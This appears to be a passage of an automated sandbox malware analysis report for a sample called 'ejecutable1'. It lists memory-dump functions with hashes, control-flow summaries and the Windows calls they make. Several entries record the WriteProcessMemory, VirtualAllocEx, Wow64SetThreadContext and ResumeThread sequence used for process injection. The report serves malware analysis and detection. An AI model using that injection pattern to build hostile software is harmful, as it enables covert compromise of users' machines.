                                                                    • Opcode ID: ba0debfce125050e28a4aeeb55983f37cb032842bf14af7151ed8c9cbfeb6cb2
                                                                    • Instruction ID: e4ae63e43c48794d775204d126131e79120e0e65ad6a2e581f5754ccef418040
                                                                    • Opcode Fuzzy Hash: ba0debfce125050e28a4aeeb55983f37cb032842bf14af7151ed8c9cbfeb6cb2
                                                                    • Instruction Fuzzy Hash: F741BBB4D052589FCF00CFA9D984AEEFBF1BB49314F24942AE815B7240D734AA45CF64
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00DA7B68, Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1136 da7b68-da7bd3 1138 da7bea-da7c51 WriteProcessMemory 1136->1138 1139 da7bd5-da7be7 1136->1139 1141 da7c5a-da7cac 1138->1141 1142 da7c53-da7c59 1138->1142 1139->1138 1142->1141
                                                                    APIs
                                                                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00DA7C3B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.406205874.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_da0000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: MemoryProcessWrite
                                                                    • String ID:
                                                                    • API String ID: 3559483778-0
                                                                    • Opcode ID: f9acb43883dec549d1742cdc2a6c5ae5afb206497adc0d9dccd214dfbefa920f
                                                                    • Instruction ID: b199e6cf06f162e11ccc7707ed6cbb909bf7995c179c4bd586f7778f12088325
                                                                    • Opcode Fuzzy Hash: f9acb43883dec549d1742cdc2a6c5ae5afb206497adc0d9dccd214dfbefa920f
                                                                    • Instruction Fuzzy Hash: 934199B4D012589FCF00CFA9D984AEEFBF5BB49314F24942AE819B7240D735AA45CF64
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00DA7D14, Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1147 da7d14-da7de0 ReadProcessMemory 1151 da7de9-da7e3b 1147->1151 1152 da7de2-da7de8 1147->1152 1152->1151
                                                                    APIs
                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00DA7DCA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.406205874.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_da0000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: MemoryProcessRead
                                                                    • String ID:
                                                                    • API String ID: 1726664587-0
                                                                    • Opcode ID: 2076f2e89dffe88304db722034e609f32fadd73a37b09b35ce89d3e87d038549
                                                                    • Instruction ID: a4fe4eb9c1ef9a1c122e780aa6236fd722bd41c900fa89d7ea9514e31eb075a5
                                                                    • Opcode Fuzzy Hash: 2076f2e89dffe88304db722034e609f32fadd73a37b09b35ce89d3e87d038549
                                                                    • Instruction Fuzzy Hash: 5141A9B8D042589FCF10CFA9D884AEEFBB5BF09310F24942AE815B7240D735A945CF65
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00DA7D18, Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1157 da7d18-da7de0 ReadProcessMemory 1160 da7de9-da7e3b 1157->1160 1161 da7de2-da7de8 1157->1161 1161->1160
                                                                    APIs
                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00DA7DCA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.406205874.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_da0000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: MemoryProcessRead
                                                                    • String ID:
                                                                    • API String ID: 1726664587-0
                                                                    • Opcode ID: c4c7f4fa51f022d73f2fb6e97a88b15489eaf4d640370e58272112e1545105f7
                                                                    • Instruction ID: 9cbd495c2b9c95fb65d08a643c159f79be5bd6e65796cb758e37c6082d78bb8a
                                                                    • Opcode Fuzzy Hash: c4c7f4fa51f022d73f2fb6e97a88b15489eaf4d640370e58272112e1545105f7
                                                                    • Instruction Fuzzy Hash: 3441B9B8D002589FCF00CFA9D884AEEFBB5BF09310F24942AE815B7200D735A945CF65
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00DA79EB, Relevance: 1.6, APIs: 1, Instructions: 105memoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1166 da79eb-da7a9c VirtualAllocEx 1170 da7a9f-da7ab0 1166->1170 1171 da7ab9-da7b03 1170->1171 1172 da7ab2-da7ab8 1170->1172 1172->1171
                                                                    APIs
                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00DA7A9A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.406205874.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_da0000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    • Opcode ID: f5124601f908cd4e886a6e705e0e08983a6f0688527eab5901719fb4e8af308b
                                                                    • Instruction ID: 7b9a894058c4738f8bd5d0b70ee09edc9f249d9742762ed6391eb57c5fea1693
                                                                    • Opcode Fuzzy Hash: f5124601f908cd4e886a6e705e0e08983a6f0688527eab5901719fb4e8af308b
                                                                    • Instruction Fuzzy Hash: 66418AB9D002589FCF10CFA9D884ADEFBB5FB49310F14942AE915B7200D735A915CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00DA79F0, Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1177 da79f0-da7a9c VirtualAllocEx 1180 da7a9f-da7ab0 1177->1180 1181 da7ab9-da7b03 1180->1181 1182 da7ab2-da7ab8 1180->1182 1182->1181
                                                                    APIs
                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00DA7A9A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.406205874.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_da0000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    • Opcode ID: 8c56a9612ea45b35199fb36daf3b89553bbffd6393af9f6c119135e16c8c508a
                                                                    • Instruction ID: b916ce4328ed63255aa6987fdfefad763fd6c0b779c17037d5d07e8640727e09
                                                                    • Opcode Fuzzy Hash: 8c56a9612ea45b35199fb36daf3b89553bbffd6393af9f6c119135e16c8c508a
                                                                    • Instruction Fuzzy Hash: 234198B8D002589FCF10CFA9D884AEEFBB5FB49310F20942AE815B7200D735A901CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00DA7778, Relevance: 1.6, APIs: 1, Instructions: 98threadCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1187 da7778-da77e0 1189 da77e2-da77f4 1187->1189 1190 da77f7-da7845 Wow64SetThreadContext 1187->1190 1189->1190 1192 da784e-da789a 1190->1192 1193 da7847-da784d 1190->1193 1193->1192
                                                                    APIs
                                                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 00DA782F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.406205874.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_da0000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: ContextThreadWow64
                                                                    • String ID:
                                                                    • API String ID: 983334009-0
                                                                    • Opcode ID: 201830239fa3ca9f513c8b8157d505ad1c6b078520e953823f8185f26ff20b26
                                                                    • Instruction ID: 3302aae2ec1ed52ca63b145351604ec3c7cfaeb42afa0dcc92d26ff106ff4e25
                                                                    • Opcode Fuzzy Hash: 201830239fa3ca9f513c8b8157d505ad1c6b078520e953823f8185f26ff20b26
                                                                    • Instruction Fuzzy Hash: 4041ACB4D012589FCB14CFA9D884AEEFBB1FF49314F24842AE419B7240D739A945CFA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00DA7780, Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 00DA782F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.406205874.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_da0000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: ContextThreadWow64
                                                                    • String ID:
                                                                    • API String ID: 983334009-0
                                                                    • Opcode ID: 3314aea7dc9985a88a435f4c8229e47011e4e039cc8726013fd8a83dd74ae8ac
                                                                    • Instruction ID: 5aa34d91db77ec1eaaf179983c22aee3212ba31117367eeebddd5ca597476729
                                                                    • Opcode Fuzzy Hash: 3314aea7dc9985a88a435f4c8229e47011e4e039cc8726013fd8a83dd74ae8ac
                                                                    • Instruction Fuzzy Hash: 7E41BEB4D012589FCB10CFA9D884AEEFBF5BF49314F24842AE415B7240D779A945CFA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00DA7640, Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ResumeThread.KERNELBASE(?), ref: 00DA76BE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.406205874.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_da0000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: ResumeThread
                                                                    • String ID:
                                                                    • API String ID: 947044025-0
                                                                    • Opcode ID: 4529a5b4343182da4a2670f3717a3c34892dc753b86b9e9e0229feff04db6bea
                                                                    • Instruction ID: 16c6bfa24dab3c086b060aba5e5413f039c5358f6404f13bbb401e6d8c525050
                                                                    • Opcode Fuzzy Hash: 4529a5b4343182da4a2670f3717a3c34892dc753b86b9e9e0229feff04db6bea
                                                                    • Instruction Fuzzy Hash: 73319AB5D012189FCB14CFA9D884ADEFBB5AB49314F24982AE815B7240D735A901CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00DA763B, Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ResumeThread.KERNELBASE(?), ref: 00DA76BE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.406205874.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_da0000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: ResumeThread
                                                                    • String ID:
                                                                    • API String ID: 947044025-0
                                                                    • Opcode ID: 5e876c8424e015d9dc2bc9b517f05af949fa17dccab2afee76661151c4d6d344
                                                                    • Instruction ID: 7279f0e009a9e600953280ee44e06515e8ec0bac4c88f19476d339fbddaf3b99
                                                                    • Opcode Fuzzy Hash: 5e876c8424e015d9dc2bc9b517f05af949fa17dccab2afee76661151c4d6d344
                                                                    • Instruction Fuzzy Hash: 2731AAB4D042189FCB14CFA9D884AEEFBB5AB49314F24982AE815B7240C735A901CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 002781B0, Relevance: .3, Instructions: 319COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 12c74f16f0a2445f8383e25d0fae2f79f12382288d7ae39f355c9474c4e67d08
                                                                    • Instruction ID: 2fc0c33ffc756776737c13bd595f401cb83fd59300490c12e5127111491465e2
                                                                    • Opcode Fuzzy Hash: 12c74f16f0a2445f8383e25d0fae2f79f12382288d7ae39f355c9474c4e67d08
                                                                    • Instruction Fuzzy Hash: 93818B70959388CFDB11EFB8D8586DCBFB0EF06345F458496D059AB2A2DB384888CF56
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 002763C0, Relevance: .2, Instructions: 158COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 850809f51f2c641cf51251fc9987910749be9c530dea30de63b4892d1d95b1a1
                                                                    • Instruction ID: a0337123cdc2350ca86aeec8bf2ade7b510a136d653f0a423a0457935a36fee4
                                                                    • Opcode Fuzzy Hash: 850809f51f2c641cf51251fc9987910749be9c530dea30de63b4892d1d95b1a1
                                                                    • Instruction Fuzzy Hash: 946106B4E14609CFCB14CFA9D848AAEBBF2FF49304F54902AE509AB354DB749951CF40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00278793, Relevance: .2, Instructions: 156COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3b6f1fdeb7c3bb4f1fd9191b93a3741b60fac2e0855d28bde8b9b4171625f7f1
                                                                    • Instruction ID: 320c224aa5e022263511169f6e8b5109af4034c63795b1fbc9722cbbfd15feee
                                                                    • Opcode Fuzzy Hash: 3b6f1fdeb7c3bb4f1fd9191b93a3741b60fac2e0855d28bde8b9b4171625f7f1
                                                                    • Instruction Fuzzy Hash: 0A8115B4E10259CFDB20DFA4E848AACBBF1FB09345F50C4A9E41DA7261DB785984CF45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00276D2F, Relevance: .2, Instructions: 153COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d9952d2ed1ce9e6c0016fc99f75df8ee03a45f9840a3b2d2d0b670af07239cc8
                                                                    • Instruction ID: 85e3e071d3e8f8dea4a7fc43b228a95307074e5bc1e187e4f3fc2b309bbe845b
                                                                    • Opcode Fuzzy Hash: d9952d2ed1ce9e6c0016fc99f75df8ee03a45f9840a3b2d2d0b670af07239cc8
                                                                    • Instruction Fuzzy Hash: C7511570E25619CFCB04CFA9D4886EDBBF2BF88300F24C42AD419AB644D7749995CF51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0027893F, Relevance: .1, Instructions: 149COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c4121a65893289ed4d81da6eab1b60a639c0c82d3e0ecd148f8cfc3fde57d679
                                                                    • Instruction ID: 32b7300752324b533758d2add6e043df1606ecbe495ffd723d0a908c0de6f653
                                                                    • Opcode Fuzzy Hash: c4121a65893289ed4d81da6eab1b60a639c0c82d3e0ecd148f8cfc3fde57d679
                                                                    • Instruction Fuzzy Hash: 037104B4A10209CFDB50EFA8E848AACBBF1FB08345F50C5A9E41DA7260DB745984CF56
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00278B74, Relevance: .1, Instructions: 148COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 492c9f21d2e7145341e937187d0574abb49517b38c7088189bb254a96a0a5f6e
                                                                    • Instruction ID: da7d351196acc2dfb7fc0b89142752a04ad8e8e15d47452fea3366a166a3e5db
                                                                    • Opcode Fuzzy Hash: 492c9f21d2e7145341e937187d0574abb49517b38c7088189bb254a96a0a5f6e
                                                                    • Instruction Fuzzy Hash: 167125B4E10249CFDB10EFA8E848AACBBF1FF09345F50C469E419AB261DB749984CF45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00278A35, Relevance: .1, Instructions: 146COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d132bfc8729b82f7022e0aab7f30a2621a7e9e8c1ec695176f53a954475b1cae
                                                                    • Instruction ID: 4d7a693a83512b2e26e01410920172575e817fd4a2a251a6bcb283abe70bdc69
                                                                    • Opcode Fuzzy Hash: d132bfc8729b82f7022e0aab7f30a2621a7e9e8c1ec695176f53a954475b1cae
                                                                    • Instruction Fuzzy Hash: DE71F4B4E11209CFDB50DFA4D848A9CBBB1FB09344F50C5A9E41DA7360DB745984CF55
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00275A5A, Relevance: .1, Instructions: 142COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 00f9f453bee381d42ae39b2751496d2999a4b926b5564d9ea7c4d7dfe4ec61ef
                                                                    • Instruction ID: 4e95085e94faab5167d81a064182b07ea1e7db58c3fa83161b3083d99967a708
                                                                    • Opcode Fuzzy Hash: 00f9f453bee381d42ae39b2751496d2999a4b926b5564d9ea7c4d7dfe4ec61ef
                                                                    • Instruction Fuzzy Hash: 285106B0E052589FCB05CFA9C890AEDFBF2EF89314F2481AAD419E7261DB745946CF50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00278360, Relevance: .1, Instructions: 137COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 752f4f0cc82747536345d917fe1432a0f4b819948393d270b2c2a4e0691353a5
                                                                    • Instruction ID: 548d968bc8f4757463f4c6c20917aa1defc867e7b26ee854161a1cf928ff4374
                                                                    • Opcode Fuzzy Hash: 752f4f0cc82747536345d917fe1432a0f4b819948393d270b2c2a4e0691353a5
                                                                    • Instruction Fuzzy Hash: 29511370A10249CFDB10DFA8D848BACBBF0FB09345F50C4A9E41DA7261DB785994CF56
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 002783B6, Relevance: .1, Instructions: 133COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 471512e68f26c60c647289f2c043099dac5dc4017c9d71f79390415f2cf1f8af
                                                                    • Instruction ID: 57b68a01983f6a714c9d8c39d962ee82d8020936b656e0bc68623d6e794da6a5
                                                                    • Opcode Fuzzy Hash: 471512e68f26c60c647289f2c043099dac5dc4017c9d71f79390415f2cf1f8af
                                                                    • Instruction Fuzzy Hash: 87611574A10249CFDB60DFA4E848AACBBB1FB09341F50C4AAE41EA7360DB7459C4CF56
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00278463, Relevance: .1, Instructions: 119COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 17644535b9ee3153d69644510adb4241f9c2a52422331497ffd6a883b67f5e67
                                                                    • Instruction ID: e16b53f9a78c306a251034b6ae91b5798177dfda194ae3b08968466671be722a
                                                                    • Opcode Fuzzy Hash: 17644535b9ee3153d69644510adb4241f9c2a52422331497ffd6a883b67f5e67
                                                                    • Instruction Fuzzy Hash: 125107B4E50249CFDB20DFA8E84CAACBBB1FB09345F50C469E41EA7261DB745984CF46
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 002784C0, Relevance: .1, Instructions: 119COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d554f40ca22d979e42da70cd2acf7bd0bc765efb86724ccf3637e44cf861380a
                                                                    • Instruction ID: 775cfbf7f28bb0321f755f394d7eff513c5941f4406ccdcce46e0a861c9bbe40
                                                                    • Opcode Fuzzy Hash: d554f40ca22d979e42da70cd2acf7bd0bc765efb86724ccf3637e44cf861380a
                                                                    • Instruction Fuzzy Hash: 955126B4A10209CFDB10DFA4D848AACBBF1FB09345F50C469E41EA7261DB745994CF46
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0027857E, Relevance: .1, Instructions: 119COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9b26f617a5220733a63d32a9dcb9f97e671832bb0ac1a9a1d50c9db574943b95
                                                                    • Instruction ID: 883065e0cbef2ae69e043f3e4f6f6f1034bc9dac282f5b5f536440aa19868f78
                                                                    • Opcode Fuzzy Hash: 9b26f617a5220733a63d32a9dcb9f97e671832bb0ac1a9a1d50c9db574943b95
                                                                    • Instruction Fuzzy Hash: 995106B4E10249CFDB50EFA8D848AACBBB1FB09345F50C469E41DA7361DB745984CF46
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00278911, Relevance: .1, Instructions: 114COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6d90537b9e6a0edb16a17dd435b3f48e3de2cd1bc2891292a59590441bf6214d
                                                                    • Instruction ID: 26f5a10590875c75942a3c7efc54c88b6e0aab45c6673dc2f025b7a134a64822
                                                                    • Opcode Fuzzy Hash: 6d90537b9e6a0edb16a17dd435b3f48e3de2cd1bc2891292a59590441bf6214d
                                                                    • Instruction Fuzzy Hash: B15106B4E10249CFDB10EFA8E848AACBBF1FB09345F50C469E419AB361DB745994CF46
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0027851D, Relevance: .1, Instructions: 114COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cbb067c6e90530ecb58daeb744763bd88fa511d9e4ed0758e1b8852d91311881
                                                                    • Instruction ID: fdfe7dee57daac0e2b2fcc2fbc63d3ad21ca891ba6b33740c634df5a34108664
                                                                    • Opcode Fuzzy Hash: cbb067c6e90530ecb58daeb744763bd88fa511d9e4ed0758e1b8852d91311881
                                                                    • Instruction Fuzzy Hash: 135105B4E10249CFDB10EFA8E44CAACBBF1FB09345F50C469E419AB261DB785994CF46
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0027854D, Relevance: .1, Instructions: 114COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 32f0757ef0bf388f989b6cc3ee257c0ba74bd0dfccde55b5bd2e098eb34600f5
                                                                    • Instruction ID: 9e09a608eeaf63b600b8add2dab077fa599bf4feec0716d159c3173ba535f308
                                                                    • Opcode Fuzzy Hash: 32f0757ef0bf388f989b6cc3ee257c0ba74bd0dfccde55b5bd2e098eb34600f5
                                                                    • Instruction Fuzzy Hash: 0551F6B4A10249CFDB10EFA8E84CAACBBF1FB09345F50C469E419AB261DB745994CF46
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 002788A3, Relevance: .1, Instructions: 112COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b7032f093fae0aec0f117241aedd230065d34e32d070811babc02166bd21b41c
                                                                    • Instruction ID: 3489771623a50bde0a5d6475e7ec87a1a546937bbe5a515da1165098f3112a3f
                                                                    • Opcode Fuzzy Hash: b7032f093fae0aec0f117241aedd230065d34e32d070811babc02166bd21b41c
                                                                    • Instruction Fuzzy Hash: C35106B4A10249CFDB10EFA8E44CAACBBF1FB09345F50C469E41AAB261DB745994CF46
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0017D1D4, Relevance: .1, Instructions: 72COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405762675.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_17d000_ejecutable1.jbxd
